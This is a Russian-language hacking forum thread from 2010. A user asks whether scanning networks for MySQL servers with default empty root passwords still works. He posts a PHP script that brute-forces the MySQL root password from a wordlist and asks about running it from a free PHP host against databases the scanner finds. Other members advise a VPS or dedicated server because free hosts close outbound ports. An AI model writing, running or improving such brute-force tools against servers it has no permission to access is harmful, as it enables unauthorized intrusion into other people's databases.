пару вопросов по статейке - Взлом СУБД

Discussion in 'Песочница' started by Demon1X, 15 May 2010.

  1. Demon1X

    Demon1X New Member

    Joined:
    31 May 2007
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    тут вчера наткнулся на статейку http://www.inattack.ru/article/469.html

    суть которой сводится к тому что можно просканить сеть каким нибудь сканером (например nmap-ом) и попробывать приконнектится к СУБД с расчетом, что когда ее устанавливали забыли по дефолту пароль поставить

    1. это актуально? т.е. такое еще работает, статейка та не первой свежести

    2. т.к. недавно начал изучать пых по прочтению решил набросать простой скриптик-брутер. У меня на локалхосте нормально пас подбирает к mysql. Вопрос можно ли будет его залить на фрихост с поддержкой пхп и оттуда брутить найденные сканером СУБД?

    Code:
    <?php
    $host="localhost";
    $name="root";
     
    set_time_limit(0);
    $f=fopen("words.dic","rt") or die("Нет файла с паролями!");
    
    if (@mysql_connect($host,$name,"")){
       echo "Пароля нет!";
       fclose ($f);
       @mysql_close();
       exit;
    }//if
    
    while (true){
        $str=trim(fgets ($f));
    	if ($str=="") break;
    
    	if (@mysql_connect($host,$name,$str)){
    	    echo "Пароль: ".$str;
    		fclose ($f);
    		@mysql_close();
    		exit;
    	}//if
    }//wh
      
    echo "Пароль не найден!";
    fclose ($f);
    ?>
    
     
  2. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Питон. щас все хостеры на серверах закрывают внешние порты :) Уже не актуально это делать :)
     
  3. Demon1X

    Demon1X New Member

    Joined:
    31 May 2007
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    ммм... нубский вопросик под словом "Питон.", что имел ввиду - язык или брандмауэр какой?
     
    #3 Demon1X, 15 May 2010
    Last edited: 15 May 2010
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    фрихосты только если, ну или хосты за пять рублей.


    Demon1X, можно конечно, но фрихост не пойдет, лучше с vps или выделенного сервера.
     
  5. _K4_

    _K4_ New Member

    Joined:
    3 Feb 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Уверен на 100% что если где-то и будет база без пароля, то только на каком нибудь зачуханном дёдике.
    На крайняк коннект только с localhost.
     
Loading...
Similar Threads - пару вопросов статейке
  1. gilo20
    Replies:
    2
    Views:
    2,504
  2. Dobi768
    Replies:
    2
    Views:
    2,419
  3. avva99on
    Replies:
    0
    Views:
    2,420